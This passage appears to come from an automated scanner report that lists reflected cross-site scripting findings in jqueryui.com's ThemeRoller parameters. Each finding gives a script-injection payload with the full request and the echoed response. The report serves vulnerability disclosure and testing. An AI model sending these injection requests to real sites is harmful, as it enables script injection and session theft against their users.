GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png420d7"><script>alert(1)</script>43bc00d2166&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png420d7"><script>alert(1)</script>43bc00d2166&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHig
...[SNIP]...

3.155. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd29c"><script>alert(1)</script>6b56a51ca68 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.pngfd29c"><script>alert(1)</script>6b56a51ca68&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.pngfd29c"><script>alert(1)</script>6b56a51ca68&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcD
...[SNIP]...

3.156. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88bc"><script>alert(1)</script>371ad7ef019 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.pnga88bc"><script>alert(1)</script>371ad7ef019&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.pnga88bc"><script>alert(1)</script>371ad7ef019&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f
...[SNIP]...

3.157. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80133"><script>alert(1)</script>785ff6f694b was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png80133"><script>alert(1)</script>785ff6f694b&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png80133"><script>alert(1)</script>785ff6f694b&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

3.158. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cbe4"><script>alert(1)</script>0b3844709c3 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png6cbe4"><script>alert(1)</script>0b3844709c3&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
"/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png6cbe4"><script>alert(1)</script>0b3844709c3&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcConte
...[SNIP]...

3.159. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1deb"><script>alert(1)</script>8320d1e8237 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.pngc1deb"><script>alert(1)</script>8320d1e8237&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
7bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.pngc1deb"><script>alert(1)</script>8320d1e8237&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

3.160. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91f47"><script>alert(1)</script>86f6ab1337a was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png91f47"><script>alert(1)</script>86f6ab1337a&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png91f47"><script>alert(1)</script>86f6ab1337a&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636
...[SNIP]...

3.161. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4c61"><script>alert(1)</script>2558bcf702b was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pngf4c61"><script>alert(1)</script>2558bcf702b&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pngf4c61"><script>alert(1)</script>2558bcf702b&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

3.162. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa1ed"><script>alert(1)</script>af92b1064b8 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngfa1ed"><script>alert(1)</script>af92b1064b8&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngfa1ed"><script>alert(1)</script>af92b1064b8&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.163. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64a53"><script>alert(1)</script>2590027d388 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

